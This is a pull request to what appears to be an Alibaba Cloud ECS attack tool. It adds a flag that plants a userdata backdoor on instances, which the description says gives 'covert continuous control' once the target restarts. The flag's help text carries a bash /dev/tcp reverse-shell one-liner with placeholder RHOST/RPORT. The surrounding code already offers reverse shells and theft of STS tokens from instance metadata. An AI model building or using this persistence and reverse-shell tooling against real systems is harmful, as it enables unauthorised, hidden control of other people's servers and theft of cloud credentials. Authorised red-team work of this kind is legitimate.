### PR TITLE
Added userdata backdoor function

### DIFF
--- a/cmd/alibaba/ecs.go
+++ b/cmd/alibaba/ecs.go
@@ -26,6 +26,7 @@ var (
 	ecsExecRegion              string
 	ecsLsSpecifiedInstanceID   string
 	ecsExecSpecifiedInstanceID string
+	userDataBackdoor           string
 )
 
 func init() {
@@ -48,6 +49,7 @@ func init() {
 	ecsExecCmd.Flags().StringVar(&lport, "lport", "", "设置反弹 shell 的主机端口 (Set the port of the listening host)")
 	ecsExecCmd.Flags().BoolVarP(&batchCommand, "batchCommand", "b", false, "一键执行三要素，方便 HW (Batch execution of multiple commands used to prove permission acquisition)")
 	ecsExecCmd.Flags().BoolVarP(&userData, "userData", "u", false, "一键获取实例中的用户数据 (Get the user data on the instance)")
+	ecsExecCmd.Flags().StringVarP(&userDataBackdoor, "userDataBackdoor", "U", "", "参数中输入命令例如bash -i >& /dev/tcp/RHOST/RPORT 0>&1，放置userdata后门（Input the command such as bash -i >& /dev/tcp/RHOST/RPORT 0>&1, Place backdoor userdata on instance")
 	ecsExecCmd.Flags().BoolVarP(&metaDataSTSToken, "metaDataSTSToken", "m", false, "一键获取实例元数据中的临时访问密钥 (Get the STS Token in the instance metadata)")
 	ecsExecCmd.Flags().IntVarP(&timeOut, "timeOut", "t", 60, "设置命令执行结果的等待时间 (Set the command execution result waiting time)")
 	ecsExecCmd.Flags().BoolVarP(&ecsExecAllRegions, "allRegions", "a", false, "使用所有区域，包括私有区域 (Use all regions, including private regions)")
@@ -81,11 +83,11 @@ var ecsExecCmd = &cobra.Command{
 		} else if lhost == "" && lport != "" {
 			log.Warnln("未指定反弹 shell 的主机 IP (The ip of the listening host is not set)")
 			cmd.Help()
-		} else if command == "" && batchCommand == false && userData == false && metaDataSTSToken == false && commandFile == "" && lhost == "" && lport == "" {
+		} else if command == "" && batchCommand == false && userData == false && metaDataSTSToken == false && commandFile == "" && lhost == "" && lport == "" && userDataBackdoor == "" {
 			log.Warnf("还未指定要执行的命令 (The command to be executed has not been specified yet)\n")
 			cmd.Help()
 		} else {
-			aliecs2.ECSExec(command, commandFile, scriptType, ecsExecSpecifiedInstanceID, ecsExecRegion, batchCommand, userData, metaDataSTSToken, ecsFlushCache, lhost, lport, timeOut, ecsExecAllRegions)
+			aliecs2.ECSExec(command, commandFile, scriptType, ecsExecSpecifiedInstanceID, ecsExecRegion, batchCommand, userData, metaDataSTSToken, ecsFlushCache, lhost, lport, timeOut, ecsExecAllRegions, userDataBackdoor)
 		}
 	},
 }


### PR DESCRIPTION
利用aliyun ecs ModifyInstanceAttribute方法对服务器放置userdata后门，当目标重启服务器时生效。适用场景：目标服务器未启动、隐蔽的持续控制、可以重启服务器的情景（Use the aliyun ecs ModifyInstanceAttribute method to place a userdata backdoor on the server, which will take effect when the target restarts the server. Applicable scenarios: the target server is not started, covert continuous control, the scenario where the server can be restarted）